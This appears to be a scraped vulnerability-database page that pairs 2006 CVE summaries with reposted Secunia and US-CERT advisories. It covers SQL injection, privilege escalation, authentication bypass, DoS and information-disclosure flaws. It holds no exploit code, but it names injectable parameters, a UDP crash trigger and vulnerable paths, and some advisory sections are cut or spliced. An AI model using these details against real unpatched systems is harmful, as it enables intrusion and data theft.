Less critical
IMPACT:
Unknown
WHERE:
Local system
SOFTWARE:
Parallels Desktop for Mac
http://secunia.com/product/12498/
DESCRIPTION:
Fabio Pietrosanti has reported a security issue with unknown impact
in Parallels Desktop for Mac.
The security issue is caused due to
/Library/StartupItems/Parallels/prl_dhcpd creating the file
"/Library/Parallels/.dhcpd_configuration" with insecure file
permissions (set to 666). Other versions may also be affected.
SOLUTION:
Grant only trusted users to affected systems.
PROVIDED AND/OR DISCOVERED BY:
Fabio Pietrosanti
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0351 | CVE-2006-3973 | My Firewall Plus Local Privilege Escalation Vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
My Firewall Plus 5.0 Build 1119 does not verify if explorer.exe is running before launching iexplore.exe from the "Test Your Firewall" feature, which allows local users to gain SYSTEM privileges. My Firewall Plus is prone to a local privilege-escalation vulnerability.
A local attacker could exploit this issue to execute arbitrary machine code with SYSTEM-level privileges. A successful exploit could result in the complete compromise of the affected computer. Failed attempts would cause denial-of-service conditions.
Version 5.0 Build 1119 is vulnerable; other versions may also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
PROVIDED AND/OR DISCOVERED BY:
Secunia Research
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2006-59/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ======================================================================
Secunia Research 21/11/2006
- My Firewall Plus Privilege Escalation Vulnerability -
======================================================================
Table of Contents
Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10
======================================================================
1) Affected Software
My Firewall Plus 5.0 Build 1119.
======================================================================
2) Severity
Rating: Less critical
Impact: Privilege Escalation
Where: Local System
======================================================================
3) Vendor's Description of Software
"Corporate strength firewall for your personal PC".
The vulnerability is caused due to the application windows running
with SYSTEM privileges and the application not checking if
explorer.exe is running before performing certain actions.
Successful exploitation allows execution of arbitrary commands with
SYSTEM privileges.
======================================================================
5) Solution
Enable the password protection to reduce the risk.
======================================================================
6) Time Table
03/08/2006 - Vendor notified.
03/08/2006 - Vendor response.
16/08/2006 - Vendor reminder sent.
11/10/2006 - Vendor reminder sent.
21/11/2006 - Public disclosure.
======================================================================
7) Credits
Discovered by Secunia Research.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2006-3973 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://corporate.secunia.com/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://corporate.secunia.com/secunia_research/33/
Secunia regularly hires new skilled team members. Check the URL below to
see currently vacant positions:
http://secunia.com/secunia_vacancies/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/secunia_security_advisories/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-59/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-200611-0230 | CVE-2006-5828 | DeltaScripts PHP Classifieds Detail.PHP SQL Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in detail.php in DeltaScripts PHP Classifieds 7.1 and earlier allows remote attackers to execute arbitrary SQL commands via the user_id parameter.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
This issue affects 7.1 and prior versions; other versions may also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
PHP Classifieds "user_id" SQL Injection Vulnerability
SECUNIA ADVISORY ID:
SA22704
VERIFY ADVISORY:
http://secunia.com/advisories/22704/
CRITICAL:
Moderately critical
IMPACT:
Manipulation of data
WHERE:
>From remote
SOFTWARE:
PHP Classifieds 7.x
http://secunia.com/product/12226/
DESCRIPTION:
ajann has discovered a vulnerability in PHP Classifieds, which can be
exploited by malicious people to conduct SQL injection attacks.
Input passed to the "user_id" parameter in detail.php is not properly
sanitised before being used in a SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability is confirmed in version 7.1b.
SOLUTION:
Edit the source code to ensure that input is properly sanitised.
PROVIDED AND/OR DISCOVERED BY:
ajann
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0102 | CVE-2006-5745 | Microsoft XML Core Services XMLHTTP ActiveX control vulnerability |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. Failed exploit attempts will result in a denial-of-service condition. An attacker could exploit this vulnerability by crafting a specially crafted web page that could allow remote code execution if a user visits the web page or clicks a link in an email message. However, user interaction is required to exploit this vulnerability.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA06-318A
Microsoft Security Updates for Windows, Internet Explorer, and Adobe Flash
Original release date: November 14, 2006
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
* Adobe Flash
Overview
Microsoft has released updates that address critical vulnerabilities
in Microsoft Windows, Internet Explorer, and Adobe Flash.
I. Description
Microsoft has released updates to address vulnerabilities in Microsoft
Windows, Internet Explorer, and Adobe Flash as part of the Microsoft
Security Bulletin Summary for November 2006. Microsoft has included updates to Adobe Flash, which is
installed with Internet Explorer.
Further information is available in the Vulnerability Notes Database.
II. An attacker may also be able to cause a denial of
service.
III. Solution
Apply updates from Microsoft
Microsoft has provided updates for these vulnerabilities in the
November 2006 Security Bulletins. The Security Bulletins describe any
known issues related to the updates. Note any known issues described
in the Bulletins and test for any potentially adverse affects in your
environment.
System administrators may wish to consider using Windows Server Update
Services (WSUS).
IV. References
* US-CERT Vulnerability Notes for Microsoft November 2006 updates -
<http://www.kb.cert.org/vuls/byid?searchview&query=ms06-nov>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/>
* Microsoft Security Bulletin Summary for November 2006 -
<http://www.microsoft.com/technet/security/bulletin/ms06-nov.mspx>
* Microsoft Update - <https://update.microsoft.com/microsoftupdate/>
* Windows Server Update Services -
<http://www.microsoft.com/windowsserversystem/updateservices/default.mspx>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA06-318A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA06-318A Feedback VU#377369" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
November 14, 2006: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
iQEVAwUBRVpHwexOF3G+ig+rAQLUEAf9FSKBHOCuPIRuJYJYgY9th7ZRtNdxsWWQ
4ulkdZVv3P682sQEtF6glpLN1h+YHA1oF93uLp6T+7FKlxP1MYrxRPP5p1nH+fCa
bRmVxUSATuDrxaTZmJWcJcL8zvaNTqkkDBCpG8GN32OCwgE40xNJRsKiv2UuIAYJ
geGl8mK5PGb4Sr0Bjlw2n5fbcKkjoJXYmkxV3CXzvpPrtS1fIq0rZ19sRB4+Jw3I
heEM7rKGMo3N4OUEYTpt2yW1Mpj2zVyWo2O8PWJmuMZq1lCsECrvTvfk4/q3s4Yh
Z0l6F4Ps6L2D5PkNkg08EgxvbiPHYI8B8VZ1SlitvOcKiVOggyxYrg==
=K0Wj
-----END PGP SIGNATURE-----
.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
Microsoft XMLHTTP ActiveX Control Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA22687
VERIFY ADVISORY:
http://secunia.com/advisories/22687/
CRITICAL:
Extremely critical
IMPACT:
System access
WHERE:
>From remote
OPERATING SYSTEM:
Microsoft Windows XP Professional
http://secunia.com/product/22/
Microsoft Windows XP Home Edition
http://secunia.com/product/16/
Microsoft Windows Server 2003 Web Edition
http://secunia.com/product/1176/
Microsoft Windows Server 2003 Standard Edition
http://secunia.com/product/1173/
Microsoft Windows Server 2003 Enterprise Edition
http://secunia.com/product/1174/
Microsoft Windows Server 2003 Datacenter Edition
http://secunia.com/product/1175/
Microsoft Windows 2000 Server
http://secunia.com/product/20/
Microsoft Windows 2000 Professional
http://secunia.com/product/1/
Microsoft Windows 2000 Datacenter Server
http://secunia.com/product/1177/
Microsoft Windows 2000 Advanced Server
http://secunia.com/product/21/
SOFTWARE:
Microsoft Core XML Services (MSXML) 4.x
http://secunia.com/product/6472/
DESCRIPTION:
A vulnerability has been reported in Microsoft XML Core Services,
which can be exploited by malicious people to compromise a users
system.
The vulnerability is caused due to an unspecified error in the
XMLHTTP 4.0 ActiveX Control.
Successful exploitation allows execution of arbitrary code when a
user e.g. visits a malicious website using Internet Explorer.
NOTE: The vulnerability is already being actively exploited.
SOLUTION:
Microsoft has recommended various workarounds including setting the
kill-bit for the affected ActiveX control (see the vendor's advisory
for details).
PROVIDED AND/OR DISCOVERED BY:
Discovered as a 0-day.
ORIGINAL ADVISORY:
Microsoft
http://www.microsoft.com/technet/security/advisory/927892.mspx
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0201 | CVE-2006-5784 |
SAP Web Application Server of enserver.exe Vulnerable to reading arbitrary files
Related entries in the VARIoT exploits database: VAR-E-200611-0404 |
CVSS V2: 4.6 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in enserver.exe in SAP Web Application Server 6.40 before patch 136 and 7.00 before patch 66 allows remote attackers to read arbitrary files via crafted data on a "3200+SYSNR" TCP port, as demonstrated by port 3201. NOTE: this issue can be leveraged by local users to access a named pipe as the SAPServiceJ2E user. SAP Web Application Server is prone to a remote information-disclosure vulnerability.
An attacker can leverage this issue to gain access to sensitive data. Information obtained could aid in further attacks.
These versions are affected:
- 6.40 patch 135 and prior
- 7.00 patch 55 and prior.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
SAP Web Application Server Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA22677
VERIFY ADVISORY:
http://secunia.com/advisories/22677/
CRITICAL:
Moderately critical
IMPACT:
Exposure of sensitive information, DoS
WHERE:
>From remote
SOFTWARE:
SAP Web Application Server 7.x
http://secunia.com/product/6087/
SAP Web Application Server 6.x
http://secunia.com/product/3327/
DESCRIPTION:
Nicob has reported some vulnerabilities in SAP Web Application
Server, which can be exploited by malicious people to disclose
sensitive information or to cause a DoS (Denial of Service).
2) An unspecified error allows crashing the enserver.exe process.
The vulnerabilities are reported in version 6.40 and 7.00.
PROVIDED AND/OR DISCOVERED BY:
Nicob
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0202 | CVE-2006-5785 | SAP Web Application Server Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in SAP Web Application Server 6.40 before patch 136 and 7.00 before patch 66 allows remote attackers to cause a denial of service (enserver.exe crash) via a 0x72F2 sequence on UDP port 64999.
Exploiting this issue allows remote attackers to consume excessive system resources until the software becomes unresponsive to further calls, effectively denying service to legitimate users.
These versions are affected:
- 6.40 patch 135 and prior
- 7.00 patch 55 and prior.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
1) Due to an unspecified error it is possible to read arbitrary files
on the system with privileges of the web server.
2) An unspecified error allows crashing the enserver.exe process.
The vulnerabilities are reported in version 6.40 and 7.00.
PROVIDED AND/OR DISCOVERED BY:
Nicob
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0033 | CVE-2006-5660 | Cisco Security Agent Management Center Authentication Bypass Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Cisco Security Agent Management Center (CSAMC) 5.1 before 5.1.0.79 does not properly handle certain LDAP error messages, which allows remote attackers to bypass authentication requirements via an empty password when using an external LDAP server.
Exploiting this issue allows remote attackers to gain administrative access to the web-based administrative interface of the affected application.
This issue affects Cisco Security Agent Management Center 5.1 prior to 5.1.0.79.
This issue is being tracked by Cisco Bug ID CSCsg40822. Cisco Security Agent (CSA) provides threat protection for server and desktop computing systems. There is a loophole in CSA processing LDAP authentication, and remote attackers may use this loophole to obtain unauthorized management rights. If the administrator has the configuration or deployment role, it is possible to change the policies of the managed CSA clients. This can lead to a reduction in the security posture of the managed system and an attack on the managed system.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
The vulnerability is reported in version 5.1 prior to Hotfix
5.1.0.79.
SOLUTION:
Apply Hotfix 5.1.0.79
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/en/US/products/products_security_advisory09186a00807726f7.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0067 | CVE-2006-5721 | Outpost Firewall PRO Local Denial of Service Vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
The \Device\SandBox driver in Outpost Firewall PRO 4.0 (964.582.059) allows local users to cause a denial of service (system crash) via an invalid argument to the DeviceIoControl function that triggers an invalid memory operation. Outpost Firewall PRO is prone to a local denial-of-service vulnerability because the application fails to properly handle unexpected input.
Exploiting this issue allows local attackers to crash affected computers, denying service to legitimate users.
Outpost Firewall PRO 4.0 (964.582.059) is vulnerable to this issue; other versions may also be affected.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
Outpost Firewall "Sandbox" Driver Denial Of Service Vulnerability
SECUNIA ADVISORY ID:
SA22673
VERIFY ADVISORY:
http://secunia.com/advisories/22673/
CRITICAL:
Not critical
IMPACT:
DoS
WHERE:
Local system
SOFTWARE:
Outpost Firewall Pro 4.x
http://secunia.com/product/12472/
DESCRIPTION:
Matousec has discovered a vulnerability in Outpost Firewall, which
can be exploited by malicious, local users to cause a DoS (Denial of
Service).
The vulnerability is caused due to an error in the handling of data
sent to the "Device\Sandbox" device. This can be exploited to crash a
vulnerable system by sending arbitrary data to the said device.
The vulnerability is confirmed in version 4.0.964.6926 (582). Other
versions may be affected as well.
SOLUTION:
Restrict access to trusted users only.
PROVIDED AND/OR DISCOVERED BY:
Matousec Transparent Security
ORIGINAL ADVISORY:
Matousec Transparent Security:
http://www.matousec.com/info/advisories/Outpost-Insufficient-validation-of-SandBox-driver-input-buffer.php
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0066 | CVE-2006-5720 | Francisco Burzi PHP-Nuke of Journal In module SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in modules/journal/search.php in the Journal module in Francisco Burzi PHP-Nuke 7.9 and earlier allows remote attackers to execute arbitrary SQL commands via the forwhat parameter.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
PHP-Nuke 7.9 and prior versions are vulnerable.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
PHP-Nuke "forwhat" SQL Injection Vulnerability
SECUNIA ADVISORY ID:
SA22617
VERIFY ADVISORY:
http://secunia.com/advisories/22617/
CRITICAL:
Moderately critical
IMPACT:
Manipulation of data
WHERE:
>From remote
SOFTWARE:
PHP-Nuke 7.x
http://secunia.com/product/2385/
DESCRIPTION:
Paisterist has discovered a vulnerability in PHP-Nuke, which can be
exploited by malicious people to conduct SQL injection attacks.
Input passed to the "forwhat" parameter in modules/journal/search.php
is not properly sanitised, before being used in a SQL query. This can
be exploited to manipulate SQL queries by injecting arbitrary SQL
code.
The vulnerability is confirmed in version 7.9.
SOLUTION:
Edit the source code to ensure that input is properly verified.
PROVIDED AND/OR DISCOVERED BY:
Paisterist
ORIGINAL ADVISORY:
http://www.neosecurityteam.net/index.php?action=advisories&id=29
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200611-0057 | CVE-2006-5711 | ECI Telecom B-FOCuS Wireless 802.11b/g ADSL2+ Router Vulnerable to reading arbitrary files |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
ECI Telecom B-FOCuS Wireless 802.11b/g ADSL2+ Router allows remote attackers to read arbitrary files via a certain HTTP request, as demonstrated by a request for a router configuration file, related to the /html/defs/ URI. ECI Telecom's B-FOCuS ADSL2+ Combo332+ wireless router is prone to an information-disclosure vulnerability. The router's Web-Based Management interface fails to authenticate users before providing access to sensitive information.
Exploiting this issue may allow an unauthenticated remote attacker to retrieve sensitive information from the affected device, which may aid in further attacks. B-Focus ADSL2+ does not properly configure the web management interface, attackers can list directories, read routers and configuration files by sending specially crafted requests.
----------------------------------------------------------------------
To improve our services to our customers, we have made a number of
additions to the Secunia Advisories and have started translating the
advisories to German.
The improvements will help our customers to get a better
understanding of how we reached our conclusions, how it was rated,
our thoughts on exploitation, attack vectors, and scenarios.
This includes:
* Reason for rating
* Extended description
* Extended solution
* Exploit code or links to exploit code
* Deep links
Read the full description:
http://corporate.secunia.com/products/48/?r=l
Contact Secunia Sales for more information:
http://corporate.secunia.com/how_to_buy/15/?r=l
----------------------------------------------------------------------
TITLE:
ECI B-FOCuS Wireless Router Information Disclosure
SECUNIA ADVISORY ID:
SA22667
VERIFY ADVISORY:
http://secunia.com/advisories/22667/
CRITICAL:
Moderately critical
IMPACT:
Exposure of sensitive information
WHERE:
>From local network
OPERATING SYSTEM:
B-FOCuS Router 332+
http://secunia.com/product/12485/
DESCRIPTION:
Tal Argoni has reported a vulnerability in B-FOCuS Wireless router,
which can be exploited by malicious people to disclose certain
sensitive information.
The problem is due to improper authentication in the web-based
management, which can be exploited by an unauthenticated person to
read the router's configuration files.
PROVIDED AND/OR DISCOVERED BY:
Tal Argoni
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200610-0310 | CVE-2006-5538 | D-Link DSL-G624T firmware Unknown Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to list contents of the cgi-bin directory via unspecified vectors, probably a direct request. D-Link DSL-G624T Is cgi-bin A vulnerability exists that lists directory contents.By a third party cgi-bin The contents of the directory may be listed. D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 has an unknown information disclosure vulnerability. Dsl-G624t is prone to a remote security vulnerability